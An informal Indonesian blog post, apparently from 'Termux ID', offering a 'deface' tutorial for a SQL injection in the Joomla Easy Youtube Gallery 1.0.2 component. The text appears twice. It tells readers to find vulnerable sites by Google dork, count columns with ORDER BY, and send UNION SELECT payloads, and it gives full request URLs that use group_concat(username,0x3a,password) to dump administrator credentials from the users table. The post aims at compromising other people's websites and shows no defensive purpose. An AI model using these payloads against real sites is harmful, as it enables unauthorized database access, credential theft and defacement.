tutorial joomla Easy Youtube Gallery 1.0.2 sql Injection vulnerability - Termux ID

tutorial joomla Easy Youtube Gallery 1.0.2 sql Injection vulnerability - Termux ID

/* No Script */ body,html{overflow:hidden} .noscript{background:#01a3a4;color:#fff;padding:8% 0 0 0;position:fixed;bottom:0;left:0;top:0;right:0;z-index:1000;height:auto;-webkit-transform:translateZ(0);transform:translateZ(0);overflow:hidden} .noscript p{margin:0;text-align:center;padding:0 20px 10px 20px;margin:auto;font-size:3rem;line-height:1.5;font-family:monospace;max-width:1010px;text-transform:uppercase;font-weight:700} .noscript p span{color:#ffe88b;font-size:10rem;line-height:normal;font-weight:normal}

-->

Home / Tutorial / tutorial joomla Easy Youtube Gallery 1.0.2 sql Injection vulnerability

hay guys :v cie ketemu lagi neh sama cakil :v
ok kali ini cakil akan share tutorial deface joomblo :v eh joomla Easy Youtube Gallery 1.0.2
sql Injection :v vulnerability. sebenernya ini poc lama :v tapi gpp lah :v
siapa tau ada yg blm tau :v

langsung ae yuk simak :v
1.dork : disini
2.oke masukan dork ke google :v (di hatiku juga boleh ko wkwkwkw)
3.check eror nya dolo ea
masukan kode
+order+by+1--+ <- ga eror
+order+by+2--+ <- ga eror
dan ternyata eror di 15

(liat gambar)
(yang berarti column hanya di 14)

4.oke sekarang kita masukan kode
+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+
nanti akan terlihat seperti ini
http://localhost/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+&defaultvideo=3&Itemid=121&limitstart=18

(liat gambar)
nah udah keliatan tuh nmr nya :v
5.oke kita dump table nya :v
kode : sini

(liat gambar)
(nah udah muncul tuh :v)
6.skrng kita dump column nya
kode : group_concat(username,0x3a,password)
contoh
http://localhost/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+union+select+1,2,3,4,5,6
,group_concat(username,0x3a,password),8,9,10,11,12,13,14+from+bak_users--+&defaultvideo=3&Itemid=121&limitstart=18

(liat gambar)
nah udah ketemu tuh admin sama pw nya hehehe :v
sangad mudah bukan :v
oke sekian dan terima kasih :v
kalo ada yang tidak tau silahkan nanya di fp kami
sini bree

tutorial joomla Easy Youtube Gallery 1.0.2 sql Injection vulnerability

hay guys :v cie ketemu lagi neh sama cakil :v
ok kali ini cakil akan share tutorial deface joomblo :v eh joomla Easy Youtube Gallery 1.0.2
sql Injection :v vulnerability. sebenernya ini poc lama :v tapi gpp lah :v
siapa tau ada yg blm tau :v

langsung ae yuk simak :v
1.dork : disini
2.oke masukan dork ke google :v (di hatiku juga boleh ko wkwkwkw)
3.check eror nya dolo ea
masukan kode
+order+by+1--+ <- ga eror
+order+by+2--+ <- ga eror
dan ternyata eror di 15

(liat gambar)
(yang berarti column hanya di 14)

4.oke sekarang kita masukan kode
+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+
nanti akan terlihat seperti ini
http://localhost/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+&defaultvideo=3&Itemid=121&limitstart=18

(liat gambar)
nah udah keliatan tuh nmr nya :v
5.oke kita dump table nya :v
kode : sini

(liat gambar)
(nah udah muncul tuh :v)
6.skrng kita dump column nya
kode : group_concat(username,0x3a,password)
contoh
http://localhost/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+union+select+1,2,3,4,5,6
,group_concat(username,0x3a,password),8,9,10,11,12,13,14+from+bak_users--+&defaultvideo=3&Itemid=121&limitstart=18

(liat gambar)
nah udah ketemu tuh admin sama pw nya hehehe :v
sangad mudah bukan :v
oke sekian dan terima kasih :v
kalo ada yang tidak tau silahkan nanya di fp kami
sini bree

Subscribe to: Post Comments (Atom)